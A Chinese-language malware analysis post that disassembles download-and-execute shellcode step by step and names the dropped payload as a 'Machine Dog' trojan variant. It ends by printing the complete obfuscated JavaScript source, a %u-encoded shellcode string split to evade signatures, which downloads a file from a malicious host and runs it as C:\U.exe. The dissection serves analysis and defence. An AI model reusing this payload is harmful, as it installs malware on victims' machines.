从执行流程看shellcode(一)[附源代码]
1、shellcode初始化代码
00401000 > $8D85 70FEFFFF lea eax, dword ptr ;shellcode初始化代码
00401006 .50 push eax ; /pWSAData
00401007 .68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
0040100C .FF15 18504000 call dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
2、获取函数地址的运算部分
00401020 .EB 54 jmp short 00401076 -------------------
00401022/$8B75 3C mov esi, dword ptr |
00401025|.8B7435 78 mov esi, dword ptr |
00401029|.03F5 add esi, ebp |
0040102B|.56 push esi |
0040102C|.8B76 20 mov esi, dword ptr
0040102F|.03F5 add esi, ebp
00401031|.33C9 xor ecx, ecx
00401033|.49 dec ecx
00401034|>41 /inc ecx
00401035|.AD |lods dword ptr ;这部分就是获取函数地址的运算部分
00401036|.33DB |xor ebx, ebx
00401038|>36:0FBE1428 |/movsx edx, byte ptr ss:
0040103D|.38F2 ||cmp dl, dh
0040103F|.74 08 ||je short 00401049
00401041|.C1CB 0D ||ror ebx, 0D
00401044|.03DA ||add ebx, edx |
00401046|.40 ||inc eax |
00401047|.^ EB EF |\jmp short 00401038 |
00401049|>3BDF |cmp ebx, edi |
0040104B|.^ 75 E7 \jnz short 00401034 ----------------------------
3、shellcode运行的整个流程：最终通过 hxxp://qq.18i16.net/exe1/lzz.css 下载指定的病毒到用户计算机上执行。经分析，下载下来的是“机器狗”的最新变种，美其名曰“犇牛”。
00401090 .8B40 3C mov eax, dword ptr
00401093 >95 xchg eax, ebp ;交换
00401094 .BF 8E4E0EEC mov edi, EC0E4E8E ;EDI初始化
00401099 .E8 84FFFFFF call 00401022 ;获取到kernel32.LoadLibraryA
0040109E .83EC 04 sub esp, 4
004010A1 .832C24 3C sub dword ptr , 3C
004010A5 .FFD0 call eax ;执行加载urlmon.dll
004010A7 .95 xchg eax, ebp
004010A8 .50 push eax
004010A9 .BF 361A2F70 mov edi, 702F1A36
004010AE .E8 6FFFFFFF call 00401022 ;urlmon.URLDownloadToFileA
004010B3 .8B5424 FC mov edx, dword ptr
004010B7 .8D52 BA lea edx, dword ptr ;执行后保存到本地的文件路径和名称 C:\U.exe
004010BA .33DB xor ebx, ebx
004010BC .53 push ebx
004010BD .53 push ebx
004010BE .52 push edx ;C:\U.exe 压栈
004010BF .EB 24 jmp short 004010E5
004010C1 $53 push ebx
004010C2 .FFD0 call eax ;hxxp://qq.18i16.net/exe1/lzz.css执行下载
004010C4 .5D pop ebp
004010C5 .BF 98FE8A0E mov edi, 0E8AFE98 ;edi初始化
004010CA .E8 53FFFFFF call 00401022 ;获取到函数kernel32.WinExec
004010CF .83EC 04 sub esp, 4
004010D2 .832C24 62 sub dword ptr , 62
004010D6 .FFD0 call eax ;执行
004010D8 .BF 7ED8E273 mov edi, 73E2D87E
004010DD .E8 40FFFFFF call 00401022 ;获取到函数kernel32.ExitProcess
004010E2 .52 push edx
004010E3 .FFD0 call eax ; shellcode执行完毕退出
004010E5 >E8 D7FFFFFF call 004010C1 ; 获取到函数地址后开始执行动作
源代码:
// NOTE(review): `huoqiang` holds the same shellcode bytes that the disassembly above walks
// through, %u-encoded one little-endian word at a time and decoded with unescape(): the
// leading "%u54EB" is the `jmp short` at 00401020 and "%u758B" the `mov esi` that follows it.
// Several fragments are split mid-token ("%u408"+"B", "%u"+"1C7"+"0"), presumably so the
// literal does not match a simple string signature; the decoded tail spells the download
// URL and the drop path C:\U.exe named in the analysis. The literal is kept verbatim here as
// analysis evidence; the line breaks inside the quoted strings are page wrapping, not valid JS.
var huoqiang=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%
u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%
u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%
uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%
u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%
u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%
uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%
u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%
u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%
u7074%u2f3a%u712f%u2e71%u3831%u3169%u2e36%u656e%u2f74%u7865"+"%u3165%u6c2f%u7a7a%u632e%u7373%u0000");